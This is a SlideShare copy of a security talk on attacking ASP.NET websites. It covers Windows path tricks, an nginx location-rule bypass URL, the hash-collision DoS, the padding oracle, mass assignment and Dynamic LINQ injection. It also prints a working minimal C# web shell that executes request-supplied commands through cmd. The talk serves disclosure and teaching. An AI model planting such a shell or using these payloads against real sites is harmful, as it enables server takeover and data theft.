SlideShare a Scribd company logo
TO HACK AN ASP .NET WEBSITE?

HARD, BUT POSSIBLE!




                        Vladimir Kochetkov

                      Positive Technologies
A Blast From The Past: File System

   DOS devices and reserved names:

        NUL:, CON:, AUX:, PRN:, COM[1-9]:, LPT[1-9]: - the colon is
optional, names can be used as part of the path
   Reserved characters:

        < > : "    / | ? *
   Case insensitivity of names:

        Filename == FileName == filename == FILENAME
   Support for short names 8.3:

        LongFileName.Extension ~= LONGFI~1.EXT ~= LO0135~1.EXT
   Ending characters:

        Filename == Filename... == Filename
A Blast From The Past: File System

   Named pipe and mailslots (CreateFile):

        Hostpipe<name> , Hostmailslot<name>
   Alternative syntax of relative paths:

        C:Windowsnotepad.exe == C:notepad.exe , if Windows is a
current catalog of C:
   Substitutions (FindFirstFile):

        < == * , > == ? , " == .
   UNC and Unicode paths:

        C:WindowsSystem32
        HostC$WindowsSystem32
        .C:WindowsSystem32
        ?C:WindowsSystem32
        ?UNCHostC$WindowsSystem32
A Blast From The Past: File System

  Meta attributes and NTFS alternative data streams:

      Directory:<Name>:<Type>File:<Name>:<Type>

                Files Meta Attributes         Indices Meta Attributes

        $STANDARD_INFORMATION            $INDEX_ROOT

        $FILE_NAME                       $INDEX_ALLOCATION

        $DATA                            $BITMAP

        $ATTRIBUTE_LIST

        $OBJECT_ID

        $REPARSE_POINT


      C:Windowshh.exe == C:Windows:$I30:$INDEX_ALLOCATIONhh.exe
      C:Windowsnotepad.exe == C:Windowsnotepad.exe::$DATA
      FileName.aspx == FileName.aspx:.jpg
[PT-2012-06] Nginx Restrictions Bypass

  Severity level:            Medium (5.0)
                             (AV:N/AC:L/Au:N/C:P/I:N/A:N)

  Vulnerable versions:       Nginx for Windows <= v1.3

  Vector:                    Remote

  The flaw enables an intruder to forward HTTP requests to certain URL addresses,
  bypassing the rules set in the Location directives of the web server configuration.

  By exploiting the vulnerability, a potential hacker could gain access to the
  application source code and closed parts of the website, detect new vulnerabilities,
  steal passwords to the database or other services, etc.



  :$I30:$INDEX_ALLOCATION

  were processed as a part of the catalog name.
[PT-2012-06] Nginx Restrictions Bypass


                                   http://hostname/.svn/entries



                                       HTTP/1.1 403 Forbidden
                                       Server: nginx/1.2.0
  …
  location ~/.svn/ {
      deny all;
  }
  …
                                          HTTP/1.1 200 OK
                                          Server: nginx/1.2.0



                       http://hostname/.svn::$INDEX_ALLOCATION/entries

                         * A stable version of nginx-1.2.0 for Windows, released 2012-04-23
.NET Platform Architecture
Memory Corruption

   Interaction with native libraries, use of mix assemblies

        MS12-025, April 2012: - arbitrary code execution is triggered
by exploitation of an integer overflow vulnerability in gdiplus.dll
which causes heap corruption when calling the constructor of the
System.Drawing.Imaging.EncoderParameter class.
   Insecure managed code



         unsafe void bufferOverflow(string s)
         {
             char* ptr = stackalloc char[10];
             foreach (var c in s)
             {
                 *ptr++ = c
             }
         }
Turkish I And Other Peculiarities

  If two strings are compared with no regard to the current regional
  settings, the result might be quite unexpected:

  The English language:   I&i
  The Turkish language:   I&ı+İ&i
   <%@ Page Language="C#" Culture="Auto" %>
   <%@ Import Namespace="System.Globalization" %>
   <! DOCTYPE html>
   …
   <script runat="server">
   …
   if (Session["mode"].ToLower() != "admin")
   …
   if (String.Compare(Request["path"]), 0,
   "FILE:", 0, 5, true)
   …
Collision of Object Hashes

  System.Object.GetHashCode() returns a 32 bit hash code of an object (takes on
  values within the range from -2147483648 to 2147483647).




  (http://blogs.msdn.com/b/ericlippert/archive/2010/03/22/socks-birthdays-and-hash-collisions.aspx)
Collision in ASP .NET (MS11-100)

     Standard situation:                             Unusual situation:




     3QBZJK5ZX=&NEUQ7BWAV6=&6902D0YP6J=&9PZGHCDJYD=&NU73S3KNV=&IF686YJQJ8K=&9XUUCJEENJ=&F
     X4A75F91FM=&IGJKQVBZAVK=&LJVJV6J3UZ=&X7GJ5MWXY=&6AVIZWTVK=&WQNIQ7OZMS=&IM1VKMZHK6F=&
     DO9WX2R9H=&RYLZSIQT8V=&KR9BBFUH2E=&UI8N4SWVWW=&TL5F6URVPP=&B1P81FWDSVV=&CM6Y80XSAO=&
     LE72GBPWB=&EEFMULEXC=&M6FKM13WB=&MGN8123XA2K=&ZMI35GXHMN=&LXQQOM138LL=&XXST36DRX=&JR
     YRV54TFZ=&LGG3X9MFN7=&MH1NI402I22=&MHFIKIM0TEH=&BWPRVCQ4X3=&RM6K7V75WZ=&SMIAE6PAL4=&
     MOCGW14ZU7=&I0JKKKOG7EN=&Q4B9V7L3VZ=&23UAYU5B31=&9TRJE0XRWQ=&3Q3LKPC2K0=&D3ACY8973E=
     =&VGJPMCQHP=&AV6THWSCA7=&MH5SM8NPWB1=&P57KEP668X=&81C4LQ4DFY=&MPJBASYMRM=&25EWGNN5NE

                                    … over 4Mb form data …
                                     (https://github.com/HybrisDisaster/aspHashDoS)
A Tricky Plan (Post-Mortem MS11-100)


    1. Create 1000 collision strings
      for each combination ‘.NET
      version’/’hardware platform’


    2. Send each combination         as
      POST request parameters


    3. Measure the response time
      for each request


    4. ???

    5. ;)
.NET Web stack
ASP.NET / MVC
ASP.NET Peculiarities

  Special catalogs and files:

  -   App_Browser –browsers definition (*.browsers)

  -   App_Code – a source code of helper classes and

      logics

  -   App_Data – data stores

  -   App_GlobalResources, App_LocalResources –
      application resources (*.resx, *.resources)

  -   App_Themes – topics (*.skin, *.css, images, etc);

  -   App_WebReferences – links to web services
      (*.wsdl, *.xsd, *.disco, *.discomap)

  -   Bin – compiled builds used by the application

  -   web.config, web.*.config – configuration files that determine settings of the
      web server and application
ASP .NET Peculiarities

  Standard HTTP handlers:

  -   WebResource.axd – access to the static resources embedded in the application
      assemblies.

  -   ScriptResource.axd – access to JavaScripts embedded in the assemblies or stored on
      the disk.

  Usage:

  http://hostname/*Resource.axd?d=<resourceId>&t=<timestamp>
  Example:

  http://hostname/ScriptResource.axd?d=JuN78WBP_dBUR_BT9LH1wlP
  8mXnNcENfktCX8YwH3sHG7wWwvn73TZaaChQhQtyzip3-
  kumGx1U67ntTt0sXKCn22VGvaQ3V4mXtCFgW9M1
  where ‘d’ is an encrypted parameters:

  Q|~/Scripts/Script1.js,~/Scripts/Script2.js,~/Scripts/Script3.js|#|21c3
  8a3a9b
Padding Oracle (MS10-070)

  Consequences:

  – getting encryption/decryption keys:

        authentication cookies

        ViewState and Event Validation

        Arguments for WebRecource.axd and ScriptResource.axd =>

            Reading arbitrary files inside the application catalog
  Corrections:

        Padding error returns a generic error message

        A random number is used as IV

        The format of encrypted strings is changed for their validation

        ScriptResource.axd can handle only *.js files
ASP .NET Features

  Standard HTTP handlers:

  -   Trace.axd request tracing (available only in the debugging mode)
Features of LFI exploitation

  Response.WriteFile(<vfilename>)

  -   Allows including any file, except *.config, inside the application catalog

  -   The file is included statically without code execution

  -   Accepts virtual file name as an argument

  Server.Execute(<vfilename>)

  -   Allows including any file, except for *.config, into the application catalog

  -   Calls a handler for the sent file, includes the result into the response

  -   Accepts virtual file name as an argument

  File.ReadAllText(<filename>)

  -   Allows including any file if obtains enough privileges

  -   The file is included statically without code execution

  -   Accepts file name as an argument
Minimum C# Shell


      <%@ Page Language="C#" %>
      <%@ Import Namespace="System.Diagnostics" %>
      <%=
      Process.Start(
          new ProcessStartInfo(
              "cmd","/c " + Request["c"]
          )
          {
              UseShellExecute = false,
              RedirectStandardOutput = true
          }
      ).StandardOutput.ReadToEnd()
      %>
ViewState

  Meant to transfer data on view
  element to the server.

  -   Is transferred in the __VIEWSTATE
      parameter

  -   Encryption and integrity are not
      ensured in many cases

  -   Is used by developers for session
      data storage on the client, though is
      not meant for this

  -   Violation of its integrity can trigger
      exploitation of various threats from
      XXS to violation of application’s
      functionality.
Request and Event Validations

  Request Validation is an embedded simple WAF aimed at preventing XSS. Blocks
  all requests that contain:

                                  &#
                    < followed by a letter, !, / and ?
  Besides, it skips extraneous parameters started with с __



  Event Validation is an embedded mechanism of
  event data validation. It is a __EVENTVALIDATION
  parameter that stores hashes of acceptable elements of                  of
  forms, events, ViewState, etc.


  Contrary to the common belief,

  it is insufficient against CSRF attacks
  as a standard implementation instance.
Mass Assignment

Model:                       Controller:
public class User            public class UserController : Controller
{                            {
    public int Id                IUserRepository _userRepository;
        { get; set; }            public UserController(IUserRepository userRepository) {
    public string UserName           _userRepository = userRepository;
        { get; set; }            }
    public string Password
        { get; set; }            public ActionResult Edit(int id) {
    public bool IsAdmin              var user = _userRepository.GetUserById(id);
        { get; set; }                return View(user);
}                                }

                                 [HttpPost]
                                 public ActionResult Edit(int id, FormCollection collection) {
                                     try {
                                         var user = _userRepository.GetUserById(id);
                                         UpdateModel(user);
                                         _userRepository.SaveUser(user);
                                         return RedirectToAction("Index");
                                     } catch {
                                         return View();
                                     }
                                 }
                             }
Mass Assignment




            (http://digitalbush.com/2012/03/05/mass-assignment-aspnet-mvc/)
LINQ Injection

  LINQ is a query language embedded into the syntax of the .NET languages.


 var result = from item in itemsList
   where item.field1 % 2 == 0
   orderby item.field2 descending
   select new { item.field2, item.field3 };        Expression.Lambda<Predicate<int>>(
                                                     Expression.Equal(
                                                        Expression.Modulo(
                                                            parameterN,
                                                            Expression.Constant(2)
                                                        ),
                                                        Expression.Constant(0)
                                                     ),
                                                     parameterN);

 var result = itemsList
   .Where(x => x.field1 % 2 == 0)
   .Select(x => new { x.field2, x.field3 })
   .OrderByDescending(x => x.field2);
LINQ Injection

  Dynamic LINQ is one of a few libraries used to create dynamic run-
  time LINQ requests.
  Features:

  -   Definition of expressions by strings;
                                              var modifier = "0";
  -   Basic simple operations
                                              var result = itemsList
  -   Access to members of static and           .Where("field1 % 2 == " + modifier)
                                                .Select(x => new { x.field2, x.field3 })
  instant data types                            .OrderByDescending(x => x.field2);
  -   Type instantiation and

  anonymous types construction



  What if "modifier" is formed out of input
  data and contains

  0 OR 1 == 1 ?
LINQ Injection

  Injection’s limitations in Dynamic LINQ:

  -    Access to fields, properties and methods is available only for a collection type or
       for accessible types specified in the ‘white list’

  -    All expression parts must be executed without errors; error messages do not
       contain useful output

  -    Injection is performable only for isolated parts of requests

  Injection’s possibilities in Dynamic LINQ:

  -    Authentication / authorization bypass

  -    Unauthorized access to the collection data

  -    Abuse of functionality (provided that the collection objects have the statefull
       fields)

  -    Conduction of DoS attacks (DoS).

      Remote Code Execution is actual in other solutions
NorthWind DEMO


public AjaxStoreResult GetCustomers(int limit, int start, string dir, string sort)
{
    var query = (from c in this.DBContext.Customers
                select new
                {
                    c.CustomerID,
                    c.CompanyName,
                    c.ContactName,
                    c.Phone,
                    c.Fax,
                    c.Region
                }).OrderBy(string.Concat(sort, " ", dir));

    int total = query.ToList().Count;

    query = query.Skip(start).Take(limit);
    return new AjaxStoreResult(query, total);
}
NorthWind DEMO




                 Demo
Thank You for Your
    Attention!

    Questions?

              vkohetkov@ptsecurity.ru
                twitter: @kochetkov_v

More Related Content

What's hot

Emmet cheat-sheet
Emmet cheat-sheetEmmet cheat-sheet
Emmet cheat-sheet
Jean Pierre Portocarrero
 
CSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoatCSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoat
Surachai Chatchalermpun
 
Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
Daniel López Jiménez
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 
FRIDA 101 Android
FRIDA 101 AndroidFRIDA 101 Android
FRIDA 101 Android
Tony Thomas
 
Welcome and FIDO Update.pptx
Welcome and FIDO Update.pptxWelcome and FIDO Update.pptx
Welcome and FIDO Update.pptx
FIDO Alliance
 
Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)
Abhinav Mishra
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Mikhail Egorov
 
Learn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPLearn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAP
Paul Ionescu
 
Android pentesting
Android pentestingAndroid pentesting
Android pentesting
Mykhailo Antonishyn
 
WebAuthn and Security Keys
WebAuthn and Security KeysWebAuthn and Security Keys
WebAuthn and Security Keys
FIDO Alliance
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
Will Schroeder
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attack
Prashant Hegde
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Romansh Yadav
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API Security
Amila Paranawithana
 
An introduction to Vue.js
An introduction to Vue.jsAn introduction to Vue.js
An introduction to Vue.js
Javier Lafora Rey
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 

What's hot (20)

Emmet cheat-sheet
Emmet cheat-sheetEmmet cheat-sheet
Emmet cheat-sheet
 
CSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoatCSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoat
 
Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
FRIDA 101 Android
FRIDA 101 AndroidFRIDA 101 Android
FRIDA 101 Android
 
Welcome and FIDO Update.pptx
Welcome and FIDO Update.pptxWelcome and FIDO Update.pptx
Welcome and FIDO Update.pptx
 
Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
Learn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPLearn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAP
 
Android pentesting
Android pentestingAndroid pentesting
Android pentesting
 
WebAuthn and Security Keys
WebAuthn and Security KeysWebAuthn and Security Keys
WebAuthn and Security Keys
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attack
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API Security
 
An introduction to Vue.js
An introduction to Vue.jsAn introduction to Vue.js
An introduction to Vue.js
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 

Viewers also liked

Взломать сайт на ASP.NET
Взломать сайт на ASP.NETВзломать сайт на ASP.NET
Взломать сайт на ASP.NET
Positive Hack Days
 
Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacks
Alexandre Moneger
 
Mobilise your ASP.NET website
Mobilise your ASP.NET websiteMobilise your ASP.NET website
Mobilise your ASP.NET website
Matt Lacey
 
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
Start Pad
 
How to create Orkut kind of Website in ASP.NET
How to create Orkut kind of Website in ASP.NETHow to create Orkut kind of Website in ASP.NET
How to create Orkut kind of Website in ASP.NET
Puneet Arora
 
Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!
Vladimir Kochetkov
 
Claims Based Authentication A Beginners Guide
Claims Based Authentication A Beginners GuideClaims Based Authentication A Beginners Guide
Claims Based Authentication A Beginners Guide
Phuong Nguyen
 
Understanding Claim based Authentication
Understanding Claim based AuthenticationUnderstanding Claim based Authentication
Understanding Claim based Authentication
Mohammad Yousri
 
Havij dork
Havij dorkHavij dork
Havij dork
iyusrusnadi
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injection
Satyajit Mukherjee
 
Hack an ASP .NET website? Hard, but possible!
Hack an ASP .NET website? Hard, but possible! Hack an ASP .NET website? Hard, but possible!
Hack an ASP .NET website? Hard, but possible!
Vladimir Kochetkov
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized Trouble
Imperva
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021
Ansgar Jahns
 
Formazione formatori
Formazione formatori Formazione formatori
Formazione formatori
stefano preto
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foody
mrp4
 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Jacqueline Vickery
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social business
piero itta
 
parameter tampering
parameter tamperingparameter tampering
parameter tampering
Ilsun Choi
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.Joy
Leandro Rangel
 

Viewers also liked (20)

Взломать сайт на ASP.NET
Взломать сайт на ASP.NETВзломать сайт на ASP.NET
Взломать сайт на ASP.NET
 
Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacks
 
Mobilise your ASP.NET website
Mobilise your ASP.NET websiteMobilise your ASP.NET website
Mobilise your ASP.NET website
 
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
 
How to create Orkut kind of Website in ASP.NET
How to create Orkut kind of Website in ASP.NETHow to create Orkut kind of Website in ASP.NET
How to create Orkut kind of Website in ASP.NET
 
Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!
 
Claims Based Authentication A Beginners Guide
Claims Based Authentication A Beginners GuideClaims Based Authentication A Beginners Guide
Claims Based Authentication A Beginners Guide
 
Understanding Claim based Authentication
Understanding Claim based AuthenticationUnderstanding Claim based Authentication
Understanding Claim based Authentication
 
Havij dork
Havij dorkHavij dork
Havij dork
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injection
 
Hack an ASP .NET website? Hard, but possible!
Hack an ASP .NET website? Hard, but possible! Hack an ASP .NET website? Hard, but possible!
Hack an ASP .NET website? Hard, but possible!
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized Trouble
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021
 
Formazione formatori
Formazione formatori Formazione formatori
Formazione formatori
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foody
 
M Power
M PowerM Power
M Power
 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social business
 
parameter tampering
parameter tamperingparameter tampering
parameter tampering
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.Joy
 

Similar to Hack ASP.NET website

SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
webhostingguy
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
oazabir
 
Bh Win 03 Rileybollefer
Bh Win 03 RileybolleferBh Win 03 Rileybollefer
Bh Win 03 Rileybollefer
Timothy Bollefer
 
Exploring Async PHP (SF Live Berlin 2019)
Exploring Async PHP (SF Live Berlin 2019)Exploring Async PHP (SF Live Berlin 2019)
Exploring Async PHP (SF Live Berlin 2019)
dantleech
 
Ch 04 asp.net application
Ch 04 asp.net application Ch 04 asp.net application
Ch 04 asp.net application
Madhuri Kavade
 
Ch23 system administration
Ch23 system administration Ch23 system administration
Ch23 system administration
Raja Waseem Akhtar
 
IIS 7: The Administrator’s Guide
IIS 7: The Administrator’s GuideIIS 7: The Administrator’s Guide
IIS 7: The Administrator’s Guide
Information Technology
 
Book
BookBook
Book
luis_lmro
 
Rapid API development examples for Impress Application Server / Node.js (jsfw...
Rapid API development examples for Impress Application Server / Node.js (jsfw...Rapid API development examples for Impress Application Server / Node.js (jsfw...
Rapid API development examples for Impress Application Server / Node.js (jsfw...
Timur Shemsedinov
 
nodejs_at_a_glance.ppt
nodejs_at_a_glance.pptnodejs_at_a_glance.ppt
nodejs_at_a_glance.ppt
WalaSidhom1
 
Asp.net tips
Asp.net tipsAsp.net tips
Asp.net tips
actacademy
 
RESTEasy
RESTEasyRESTEasy
Asp.net
Asp.netAsp.net
Asp.net
Naveen Sihag
 
Do you know what your drupal is doing? Observe it!
Do you know what your drupal is doing? Observe it!Do you know what your drupal is doing? Observe it!
Do you know what your drupal is doing? Observe it!
Luca Lusso
 
Web Security
Web SecurityWeb Security
Web Security
Chatree Kunjai
 
Local SQLite Database with Node for beginners
Local SQLite Database with Node for beginnersLocal SQLite Database with Node for beginners
Local SQLite Database with Node for beginners
Laurence Svekis ✔
 
Red5 - PHUG Workshops
Red5 - PHUG WorkshopsRed5 - PHUG Workshops
Red5 - PHUG Workshops
Brendan Sera-Shriar
 
Practical OData
Practical ODataPractical OData
Practical OData
Vagif Abilov
 
TopicMapReduceComet log analysis by using splunk
TopicMapReduceComet log analysis by using splunkTopicMapReduceComet log analysis by using splunk
TopicMapReduceComet log analysis by using splunk
akashkale0756
 

Similar to Hack ASP.NET website (20)

SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
 
Bh Win 03 Rileybollefer
Bh Win 03 RileybolleferBh Win 03 Rileybollefer
Bh Win 03 Rileybollefer
 
Exploring Async PHP (SF Live Berlin 2019)
Exploring Async PHP (SF Live Berlin 2019)Exploring Async PHP (SF Live Berlin 2019)
Exploring Async PHP (SF Live Berlin 2019)
 
Ch 04 asp.net application
Ch 04 asp.net application Ch 04 asp.net application
Ch 04 asp.net application
 
Ch23 system administration
Ch23 system administration Ch23 system administration
Ch23 system administration
 
IIS 7: The Administrator’s Guide
IIS 7: The Administrator’s GuideIIS 7: The Administrator’s Guide
IIS 7: The Administrator’s Guide
 
Book
BookBook
Book
 
Rapid API development examples for Impress Application Server / Node.js (jsfw...
Rapid API development examples for Impress Application Server / Node.js (jsfw...Rapid API development examples for Impress Application Server / Node.js (jsfw...
Rapid API development examples for Impress Application Server / Node.js (jsfw...
 
nodejs_at_a_glance.ppt
nodejs_at_a_glance.pptnodejs_at_a_glance.ppt
nodejs_at_a_glance.ppt
 
Asp.net tips
Asp.net tipsAsp.net tips
Asp.net tips
 
RESTEasy
RESTEasyRESTEasy
RESTEasy
 
Asp.net
Asp.netAsp.net
Asp.net
 
Do you know what your drupal is doing? Observe it!
Do you know what your drupal is doing? Observe it!Do you know what your drupal is doing? Observe it!
Do you know what your drupal is doing? Observe it!
 
Web Security
Web SecurityWeb Security
Web Security
 
Local SQLite Database with Node for beginners
Local SQLite Database with Node for beginnersLocal SQLite Database with Node for beginners
Local SQLite Database with Node for beginners
 
Red5 - PHUG Workshops
Red5 - PHUG WorkshopsRed5 - PHUG Workshops
Red5 - PHUG Workshops
 
Practical OData
Practical ODataPractical OData
Practical OData
 
TopicMapReduceComet log analysis by using splunk
TopicMapReduceComet log analysis by using splunkTopicMapReduceComet log analysis by using splunk
TopicMapReduceComet log analysis by using splunk
 

More from Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Positive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
Positive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
Positive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
Positive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
Positive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
Positive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
Positive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
Positive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
Positive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
Positive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
